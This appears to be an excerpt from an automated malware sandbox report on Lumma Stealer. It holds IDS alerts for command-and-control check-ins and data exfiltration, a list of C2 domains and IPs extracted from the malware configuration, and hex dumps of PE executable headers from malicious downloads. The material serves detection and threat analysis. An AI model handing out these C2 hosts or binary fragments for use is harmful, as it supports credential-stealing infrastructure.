Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50007 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50015 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50007 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49979 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50041 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49979 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50091 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50099 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50105 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50105 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50109 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50382 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49994 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49994 -> 104.21.50.161:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: drive-connect.cyou
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: home.twentygr20sb.top

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:03:09 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:03:16 GMTContent-Type: application/octet-streamContent-Length: 4485120Last-Modified: Mon, 16 Dec 2024 09:17:40 GMTConnection: keep-aliveETag: "675ff034-447000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b1 4c 5d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 e0 4b 00 00 64 71 00 00 32 00 00 00 e0 c3 00 00 10 00 00 00 f0 4b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 c4 00 00 04 00 00 7d 67 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f c0 6e 00 73 00 00 00 00 b0 6e 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 c0 c3 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 c0 c3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 6e 00 00 10 00 00 00 40 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 b0 6e 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 6e 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 39 00 00 d0 6e 00 00 02 00 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 74 66 78 75 69 6a 6f 00 00 1c 00 00 d0 a7 00 00 f4 1b 00 00 56 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 76 6b 73 61 6c 67 64 00 10 00 00 00 d0 c3 00 00 04 00 00 00 4a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 c3 00 00 22 00 00 00 4e 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:03:28 GMTContent-Type: application/octet-streamContent-Length: 4434944Last-Modified: Mon, 16 Dec 2024 09:16:00 GMTConnection: keep-aliveETag: "675fefd0-43ac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0d 1b 5f 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 94 48 00 00 fc 74 00 00 32 00 00 00 f0 c5 00 00 10 00 00 00 b0 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 c6 00 00 04 00 00 1c 93 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 60 72 00 73 00 00 00 00 50 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 d7 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 d6 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 72 00 00 10 00 00 00 36 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 50 72 00 00 02 00 00 00 46 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 72 00 00 02 00 00 00 48 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 38 00 00 70 72 00 00 02 00 00 00 4a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 69 6b 6f 77 6d 6c 00 40 1b 00 00 a0 aa 00 00 3a 1b 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6d 78 70 73 74 6c 75 00 10 00 00 00 e0 c5 00 00 04 00 00 00 86 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 c5 00 00 22 00 00 00 8a 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:03:40 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:03:46 GMTContent-Type: application/octet-streamContent-Length: 1889280Last-Modified: Mon, 16 Dec 2024 09:29:29 GMTConnection: keep-aliveETag: "675ff2f9-1cd400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 d2 3a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 40 05 00 00 02 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 76 61 63 61 6a 7a 74 00 50 1a 00 00 80 30 00 00 4e 1a 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 63 67 78 67 65 70 71 00 10 00 00 00 d0 4a 00 00 04 00 00 00 ae 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:03:55 GMTContent-Type: application/octet-streamContent-Length: 1854976Last-Modified: Mon, 16 Dec 2024 09:29:36 GMTConnection: keep-aliveETag: "675ff300-1c4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6c 6d 73 65 63 74 69 00 b0 1a 00 00 70 50 00 00 a8 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 63 67 64 64 62 6d 76 00 10 00 00 00 20 6b 00 00 06 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6b 00 00 22 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:10 GMTContent-Type: application/octet-streamContent-Length: 964608Last-Modified: Mon, 16 Dec 2024 09:27:34 GMTConnection: keep-aliveETag: "675ff286-eb800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 77 f2 5f 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 08 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 0f 00 00 04 00 00 85 68 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 